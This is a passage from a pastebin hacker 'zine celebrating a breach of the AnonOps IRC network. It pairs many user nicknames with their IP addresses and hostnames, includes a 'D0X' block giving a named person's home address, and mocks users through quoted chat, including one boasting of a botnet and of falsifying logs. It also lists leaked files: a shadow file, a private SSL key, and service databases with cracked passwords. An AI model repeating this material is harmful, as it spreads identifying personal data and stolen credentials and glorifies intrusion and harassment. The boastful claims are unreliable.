  541. uuuuffffffff 213.163.64.43 nl.gigabit.perfect-privacy.com
  542. veritas 0.0.7.209
  543. workbench 50.71.143.81
  544. wtfCALEB 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
  545. wtf_chuck 71.57.241.72 c-71-57-241-72.hsd1.pa.comcast.net
  546. xent 77.247.181.162 chomsky.torservers.net
  547. zombie 93.94.245.152 93-94-245-152.dynamic.swissvpn.net
  548. zomfg 77.111.42.10 77-111-42-10.ipv4.tusmobil.si
  549. zorro17 187.134.17.57 dsl-187-134-17-57-dyn.prod-infinitum.com.mx
  550. zxcvsd 95.140.125.37 free-125-37.mediaworksit.net
  551.  
  552.  
  553. :: 0x06 ~ l0l sh1t ::
  554.  
  555. Here's a bit of quotes we found funny.
  556.  
  557.  
  558.  
  559. <daboogieman> now that i'm an oper im no longer accepting PM's from anyone
  560. because i feel that i have too much else to do ( being an oper and all)
  561. <daboogieman> the only thing i know about irc is how to sajoin <nick> #kill
  562. and /kill <nick>
  563. <daboogieman> any attempt by a non-oper to chat to me will be met by instand
  564. gline and/or kill
  565.  
  566.  
  567.  
  568. <pie>!ban *!*@*
  569. <anon>what the fuck
  570. <pie>its ok i can do whatever i want because im drunk
  571. <pie>it will be fine in the morning
  572.  
  573.  
  574.  
  575. <Caleb>fuck my vps just got hacked with a ddos attack
  576. <Caleb>morning
  577. <Caleb>hi
  578. <Caleb>:3
  579. <Caleb>have a nice sleep? :3
  580. <Caleb>i had a good sleep
  581. <Caleb>eating my lunch now
  582. <Caleb>ohai
  583. <Caleb>ohai!
  584. <Caleb>ohai :3
  585. <Caleb>my computer seems to be fucking itself at 7000 rpms.
  586. <Caleb> just block the morons
  587. <Caleb>hmmm
  588. <Caleb>lol
  589. <Caleb>sup!
  590. <Caleb>:3
  591. <Caleb>going to sleep for a bit bbl...
  592. <Caleb>How do you hack with a DDOS attack?
  593. <Caleb>my shell just got hit with 77gbps
  594. <Caleb>im gonna destroy them when i find out who did it
  595. <Caleb>just get a VPS/VPN and use IRSSI to stop yourself getting ddosed
  596.  
  597. @CalebNewz: somehow their hitting my ip table.
  598.  
  599.  
  600. <owen>FUCK this box doesnt have wget we are screwed then
  601. <owen>[redacted] im fucking zlineing you because you're a movement traitor
  602. <owen>you dont even know who i really am and the connections i have
  603. <owen>i can just call in a favor and get your personal life ruined
  604. <owen>is there young boys here (over 18) who wanna have a chat in pm??
  605. <owen>you HAVE to install unreal to ~/Unreal3.2
  606.  
  607.  
  608.  
  609.  
  610. <Aha2Y>if your servers getting DDoSed just mitigate the attack
  611. <Aha2Y>i have this awesome script i found on hackforums
  612. <Aha2Y>it blocks ip addresses
  613. <Aha2Y>i found a backdoored zalgo source on the internet and im gonna use
  614. it on my network
  615. <Aha2Y>what the fuck i am getting ddosed cos i just saw this ip in my netstat
  616. so that means its DDoSing me right?
  617. <Aha2Y>i'll use my script of hackforums to block it
  618.  
  619.  
  620. @Power2All: For the people who used CGI:IRC, my sincerely excuses for the IP
  621. leak. I couldn't fix it in time as Nikon or Chippy DDoS't my home IP too.
  622.  
  623. @Power2All: @doxbin Oh and, I never said back when I put CGI:IRC up, that it
  624. is deemed SAFE. I said it was online, not "SAFE", dipshit.
  625. @doxbin: @Power2All Why would you even bother advertising it if it wasn't safe?
  626. That just smacks of gross negligence. Turn in your Guy Fawkes mask.
  627.  
  628. @Power2All: @anonymouSabu They are all Nullrouted sofar, and some suspended by
  629. the provider.
  630.  
  631. @Power2All: Yes, they honeypotted my IP. Using mobile connection now.
  632.  
  633.  
  634. D0X TIME :: D0X TIME :: D0X TIME :: D0X TIME :: D0X TIME :: D0X TIME :: D0X TIME
  635. Names: Rick Bonata
  636.  
  637. Address 221 FRANKLIN AVE
  638. CUYAHOGA FALLS, OH 44221
  639.  
  640.  
  641. <remsleep>i might launch at 666,666
  642. <remsleep>idk yet
  643. <remsleep>i've done small tests, like basically, i can take down BoA's website in minutes.
  644. <remsleep>it takes time to send orders to 180,000 zombies :p
  645. <remsleep>the time servers being down complicated the scanrio
  646. <remsleep>scenario
  647. <remsleep>once i hit 1,000,000 i will take out the .mil tld servers an main dns.
  648.  
  649. <Ian>on average, the typical non-root server is 10mbps
  650. <remsleep>but as far as the world is concerned, i am just a host.
  651. <remsleep>Ian: yes
  652. <remsleep>Ian: I go after school districts, fortune 500's, car dealerships, etc.
  653. <Ian>so you are talking about
  654. <Ian>10,000,000mbps
  655. <remsleep>:)
  656. <Ian>10,000gbps
  657. <remsleep>heuheheuhehehe
  658. <Ian>10 terabits
  659. <remsleep>roughly.
  660. <remsleep>plus or minus
  661. <remsleep>it's take years
  662. <remsleep>and constant evasion of law enforcement
  663. <remsleep>i've got a direct line into NCIC via telnet.
  664. <remsleep>:D :D :D
  665.  
  666. <remsleep>verified i have gov ip's on mah shit
  667. <remsleep>i am going to block ALL government ips
  668. <remsleep>http://www.uaff.info/militarytracking.htm
  669. <remsleep>fyi
  670.  
  671. <remsleep>i mean if i was a giant corporate vpn provider and they offered me like
  672. 2 mill for some ips, i would give fake ips but i would do it for the $$ lol
  673. <remsleep>not the first time i've falsified logs for money ;p
  674. <remsleep>i remember in 09 when i cleared all the cached ips / logs for Verizon
  675. DHCP clients, I was getting radio signals beemed at my house :P
  676. <remsleep>@-@
  677. <remsleep>wonder how many warrants become invalid because of that little job :D
  678. <remsleep>chinanet is connected to me
  679. <remsleep>mother fuckers
  680.  
  681. <remsleep> If the FBI does come, or whomever for whatever reason, I will have
  682. them on camera with a live feed with a 3G modem backup streaming to one of
  683. my VDSs. I would be unstopable after that, I would sue for false arrest,
  684. kidnapping, conspiracy to each, general fuckery as well as a large sum of
  685. punitive damages.
  686.  
  687. <anon> Hey
  688. <anon> 221 FRANKLIN AVE
  689. <anon> CUYAHOGA FALLS, OH 4422
  690. <anon> Lucky for you, I'm not in your jurisdiction ;)
  691. <remsleep> So you're saying you're a cop?
  692. <remsleep> And btw, that's just one of my many residential IPs in Cuyahoga
  693. Falls Ohio
  694. <remsleep> and my dns whois, falsified as well. :\
  695. <anon> Yeah, ok
  696. <anon> You should probably just /quit
  697. <anon> If you continue to enable terrorist activity, I'll call someone who
  698. DOES have jurisdiction
  699. <remsleep> ..
  700. <remsleep> Really?
  701. <anon> Really.
  702. <remsleep> Dude, call who you wanna call. I could care less.
  703. <anon> Also, seriously?
  704. <anon> 21:45:27 [basedonconfusion] -Global(services@basedonconfusion.co)-
  705. [remsleep] Memo to ANY Law Enforcement: You are compelled to
  706. leave this network, failure to do so will result in whatever
  707. evidence obtained being after this point will become sealed
  708. and unusable in court. You are tresspasing, you have been warned.
  709. <anon> HAHAHAHAHA
  710. <anon> I've kicked down the doors of file sharers who had similar
  711. notices attached to their servers
  712.  
  713. :: 0x07 ~ FiL3z ::
  714.  
  715. We've enclosed some fun files for your viewing pleasure. These are probably
  716. the best part of this dump.
  717.  
  718. Filename Description
  719. shadow /etc/shadow, self explanatory
  720. oper.db Anope Oper Database
  721. chan.db Anope Channel Database
  722. nick.db Anope NickServ Database
  723. keys.txt AnonOps private ssl key/cert
  724. defaults.conf InspIRCd Conf.
  725. nick.out.txt Human readable NickServ database w/ cracked passwords,
  726. nickname aliases, registration times, seen times, memos (LOL)
  727. chan.out.txt Huamn readable ChanServ database w/ cracked passwords,
  728. access lists, akick lists, badwords, ..etc.
  729.  
  730. :: 0x08 ~ exit ::
  731.  
  732. tl;dr ANONOPS KILLED. (LOL DEAD)
  733.  
  734. AnonOps killed Anonymous, and today, we at HEP have avenged them. We cannot
  735. bring Anonymous back to the state it was, but we've burned the abonimation
  736. that took its place to the ground. For that, we are proud. We hope you enjoyed
  737. reading this little 'zine half as much as we enjoyed owning these
  738. pseudo-activitists for the Nth time. We've personally been responsible for
  739. nulling somewhere in the neighborhood of 50 of their servers, and will just
  740. keep dropping them as they put more back up. Ryan Cleary had the right idea,
  741. in trying to get Anons to spread out, but the namefags didn't want to listen.
  742. This time, we can only hope that they do.
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!